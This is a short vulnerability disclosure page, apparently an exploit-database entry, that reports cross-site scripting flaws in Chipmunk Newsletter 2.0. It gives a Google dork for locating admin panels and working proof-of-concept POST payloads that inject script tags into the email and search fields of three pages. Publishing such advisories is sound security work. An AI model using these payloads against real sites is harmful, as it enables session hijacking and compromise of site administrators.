Chipmunk news 2.0 cross site scripting

2010-01-21 / 2010-01-22
Credit: b0telh0
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

dadf# Title: Chipmunk Newsletter XSS Vulnerabilities # Date: 01-19-2010 # Author: b0telh0 # Software Link: http://www.chipmunk-scripts.com/newsletter/newsletter.zip # Version: 2.0 # Tested on: Windows 7 Another XSS on Chipmunk Newsletter... Thanks to mr_me who found the first flaw on it! ::[ inurl:admin/login.php "Registering Admin" ]:: 1 - http://localhost/sub.php POSTDATA: email=<script>alert('xss')</script>&choice=sub&lists=1&submit=submit 2 - http://localhost/admin/addaddress.php POSTDATA: email=<script>alert('xss')</script>&lists=1&submit=submit then we can check it... http://localhost/admin/searchaddress.php POSTDATA: theaddress=<script>alert('xss')</script>&submit=submit


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top